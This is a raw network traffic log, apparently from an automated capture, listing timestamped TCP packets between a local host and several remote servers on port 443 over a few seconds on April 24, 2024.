Apr 24, 2024 15:24:14.741415024 CEST	443	49750	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:14.741439104 CEST	443	49750	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:14.741555929 CEST	49750	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:17.592365026 CEST	49750	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:17.592405081 CEST	443	49750	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:17.819489002 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:17.819540977 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:17.819616079 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:17.819900036 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:17.819910049 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.084505081 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.084546089 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.084598064 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.086623907 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.086636066 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.134001970 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.134252071 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.134268999 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.135404110 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.136293888 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.136499882 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.136671066 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.136893034 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.136945009 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.418617010 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.419898033 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.419979095 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.423743963 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.423820019 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.424760103 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.424828053 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.425024033 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.425041914 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.494414091 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494554043 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494642019 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.494679928 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494771957 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494888067 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494931936 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.494949102 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.494995117 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.495009899 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.495242119 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.495291948 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.495305061 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.495646954 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.495699883 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.495712042 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.495996952 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.496046066 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.496058941 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.496474028 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.496529102 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.496541977 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.496892929 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.496943951 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.496957064 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.497338057 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.497390985 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.497404099 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.497683048 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.497735977 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.497749090 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.498085976 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.498136997 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.498150110 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.498562098 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.498611927 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.498625994 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.499125004 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.499175072 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.499187946 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.499596119 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.499644041 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.499671936 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.500324011 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.500382900 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.500396013 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.500958920 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.501015902 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.501029015 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.501581907 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.501641035 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.501652956 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.501857042 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.501913071 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.501925945 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.502501965 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.502557993 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.502569914 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.503098011 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.503154993 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.503168106 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.503689051 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.503741980 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.503757000 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504198074 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504245043 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.504257917 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504424095 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504473925 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.504487038 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504657030 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504726887 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.504740000 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504878998 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.504934072 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.504945993 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505069971 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505134106 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.505146980 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505300999 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505345106 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.505358934 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505511999 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505558968 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.505570889 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505712032 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505758047 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.505770922 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505916119 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.505960941 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.505974054 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506084919 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506129980 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.506141901 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506295919 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506340027 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.506352901 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506503105 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506547928 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.506558895 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506680012 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506725073 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.506736040 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506892920 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.506937981 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.506948948 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.507103920 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.507148027 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.507159948 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.530461073 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.648024082 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.648092985 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.648139000 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.648669958 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.648755074 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.648772955 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.649156094 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.649205923 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.649219036 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.649671078 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.649738073 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.649750948 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.650221109 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.650271893 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.650285006 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.650808096 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.650867939 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.650880098 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.651333094 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.651386023 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.651398897 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.651884079 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.651935101 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.651947021 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.652437925 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.652486086 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.652513027 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.652967930 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.653019905 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.653032064 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.653518915 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.653573990 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.653588057 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654041052 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654107094 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.654118061 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654256105 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654299974 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.654311895 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654443979 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654486895 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.654499054 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654632092 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654679060 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.654690981 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654815912 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.654860973 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.654872894 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.655038118 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.655077934 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.655090094 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.655234098 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.655276060 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.655287027 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656138897 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656184912 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.656197071 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656282902 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656327009 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.656338930 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656486034 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.656531096 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.656546116 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657139063 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657198906 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.657212019 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657382965 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657423019 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.657434940 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657579899 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657618046 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.657629967 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657776117 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657821894 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.657835007 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.657999992 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658044100 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.658056974 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658365965 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658406973 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.658418894 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658590078 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658632040 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.658643961 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658773899 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.658817053 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.658829927 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.659248114 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.659297943 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.659312010 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.659482956 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.659526110 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.659538031 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660020113 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660063028 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.660075903 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660214901 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660260916 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.660274029 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660420895 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660479069 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.660490036 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660923958 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.660968065 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.660980940 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.661201000 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.661246061 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.661258936 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.779217005 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.788495064 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.788640976 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.788687944 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.788710117 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.788873911 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.788932085 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.800506115 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.800956011 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.801076889 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.801093102 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.801661015 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.801712990 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.801727057 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.802215099 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.802268982 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.802283049 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.802870035 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.802918911 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.802932978 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.803365946 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.803435087 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.803448915 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804019928 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804069996 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.804083109 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804490089 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804537058 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.804548979 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804924011 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.804971933 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.852600098 CEST	49751	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:18.852668047 CEST	443	49751	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:18.856158018 CEST	49753	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:18.856173992 CEST	443	49753	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:18.863641977 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:18.863722086 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:18.863763094 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:19.400274038 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:19.400288105 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:19.400876999 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.400907040 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.401031971 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.401285887 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.401303053 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.475558043 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.475604057 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.476295948 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.476520061 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.476535082 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.716321945 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.716794968 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.716804981 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.717106104 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.717564106 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.717618942 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.717839956 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:19.760119915 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:19.787389994 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.787977934 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.787993908 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.788294077 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.788862944 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.788923025 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.789048910 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:19.832117081 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:19.871659040 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.181415081 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.181540966 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.181591988 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.184135914 CEST	49756	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.184158087 CEST	443	49756	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.662163973 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.662199974 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.662285089 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.662482977 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.662496090 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.872977972 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:20.873050928 CEST	443	49755	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:20.873119116 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:20.873847961 CEST	49755	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:20.873863935 CEST	443	49755	104.17.2.184	192.168.2.4
